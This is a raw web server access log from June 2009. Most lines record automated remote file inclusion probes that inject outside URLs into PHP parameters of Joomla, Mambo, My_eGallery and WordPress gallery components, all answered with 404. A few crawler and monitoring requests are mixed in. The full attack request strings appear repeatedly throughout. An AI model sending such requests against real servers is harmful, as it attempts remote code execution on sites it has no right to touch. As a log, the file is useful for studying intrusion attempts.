74.200.195.130 - - [21/Jun/2009:08:02:31 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:32 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:32 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:34 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:34 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:34 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:34 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:35 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:35 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.137.51 - - [21/Jun/2009:08:02:35 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/beast-test.txt?? HTTP/1.1" 404 260 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
91.121.137.51 - - [21/Jun/2009:08:02:35 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.eyepro.net//assets/images/beast-test.txt?? HTTP/1.1" 404 265 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
74.200.195.130 - - [21/Jun/2009:08:02:36 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:36 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:36 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:36 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:45 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.123.143.252 - - [21/Jun/2009:08:02:47 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
74.200.195.130 - - [21/Jun/2009:08:02:47 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:48 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:02:49 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:39 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:39 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:41 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.252.92 - - [21/Jun/2009:08:03:41 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
74.200.195.130 - - [21/Jun/2009:08:03:41 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:41 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.106.252.92 - - [21/Jun/2009:08:03:42 -0400] "GET /logs/access_log.Q109050700/modules/My_eGallery/index.php?basepath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
87.106.252.92 - - [21/Jun/2009:08:03:42 -0400] "GET /modules/My_eGallery/index.php?basepath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
74.200.195.130 - - [21/Jun/2009:08:03:42 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:44 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:44 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:44 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.252.92 - - [21/Jun/2009:08:03:47 -0400] "GET /logs/error_log.Q109050700/modules/My_eGallery/index.php?basepath=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
74.200.195.130 - - [21/Jun/2009:08:03:53 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:55 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:03:58 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:08:04:07 -0400] "GET /logs/access_log.Q109061300%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:08:04:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.14 - - [21/Jun/2009:08:04:37 -0400] "GET /logs/access_log.Q109061500 HTTP/1.1" 200 5178745 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [21/Jun/2009:08:05:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L409D394E8E52520031BF04Y+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.233.11.27 - - [21/Jun/2009:08:07:07 -0400] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.233.11.27 - - [21/Jun/2009:08:07:07 -0400] "GET /logs/access_log.Q109061400//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
211.233.11.27 - - [21/Jun/2009:08:07:07 -0400] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
84.201.208.50 - - [21/Jun/2009:08:08:22 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:08:08:22 -0400] "GET //index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:08:08:22 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:08:08:42 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:08:08:43 -0400] "GET //index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:08:08:43 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:08:08:45 -0400] "GET /images/over-index3.ovalbone.jpg HTTP/1.1" 200 2229 "-" "Googlebot-Image/1.0"
211.233.11.27 - - [21/Jun/2009:08:09:13 -0400] "GET /logs/access_log.Q109060900//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
124.0.145.1 - - [21/Jun/2009:08:09:19 -0400] "GET /modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [21/Jun/2009:08:09:19 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
124.0.145.1 - - [21/Jun/2009:08:09:19 -0400] "GET /logs/access_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:08:09:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.145.1 - - [21/Jun/2009:08:09:36 -0400] "GET /logs/error_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:08:09:38 -0400] "GET //index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:08:09:38 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:08:09:39 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:08:11:13 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.54 - - [21/Jun/2009:08:11:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L109DD5482FF2E3003A0E067+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.224.21 - - [21/Jun/2009:08:13:06 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:08:13:07 -0400] "GET //index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
213.189.224.21 - - [21/Jun/2009:08:13:08 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
124.0.145.1 - - [21/Jun/2009:08:13:23 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
124.0.145.1 - - [21/Jun/2009:08:13:23 -0400] "GET /modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [21/Jun/2009:08:13:23 -0400] "GET /logs/access_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:08:13:32 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.224.21 - - [21/Jun/2009:08:13:32 -0400] "GET /logs/access_log.Q109060900//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
124.0.145.1 - - [21/Jun/2009:08:13:37 -0400] "GET /logs/error_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.234.107.233 - - [21/Jun/2009:08:13:41 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:08:13:41 -0400] "GET //index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:08:13:41 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.234.107.233 - - [21/Jun/2009:08:13:41 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
84.201.208.50 - - [21/Jun/2009:08:13:45 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [21/Jun/2009:08:13:50 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:08:13:50 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:08:13:50 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.230.156.161 - - [21/Jun/2009:08:13:50 -0400] "GET //index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
121.78.82.142 - - [21/Jun/2009:08:13:58 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:08:13:58 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:20 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:20 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:20 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [21/Jun/2009:08:14:22 -0400] "GET /logs/access_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.27.203.107 - - [21/Jun/2009:08:14:22 -0400] "GET /modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:08:14:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.27.203.107 - - [21/Jun/2009:08:14:22 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:24 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:24 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:24 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:25 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:25 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:25 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:26 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:26 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:26 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:29 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:29 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:29 -0400] "GET /logs/access_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:30 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:30 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:30 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:36 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.234.107.233 - - [21/Jun/2009:08:14:37 -0400] "GET /logs/error_log.Q109051400%20//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
74.200.195.130 - - [21/Jun/2009:08:14:37 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:39 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.27.203.107 - - [21/Jun/2009:08:14:40 -0400] "GET /logs/error_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:41 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:43 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:43 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:43 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:43 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:43 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:43 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:47 -0400] "GET /logs/error_log.Q109061000%20%20//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:47 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:49 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:49 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:50 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:55 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:14:56 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:03 -0400] "GET /logs/error_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.230.156.161 - - [21/Jun/2009:08:15:09 -0400] "GET /logs/error_log.Q109051400%20//index.php?option=com_custompages&cpage=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
74.200.195.130 - - [21/Jun/2009:08:15:46 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:46 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:46 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:47 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:47 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:47 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:49 -0400] "GET /logs//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:49 -0400] "GET //index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.200.195.130 - - [21/Jun/2009:08:15:50 -0400] "GET /logs/access_log.Q109061000//index.php?option=http://shw.or.kr/bbs/bbs_public/06qa//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
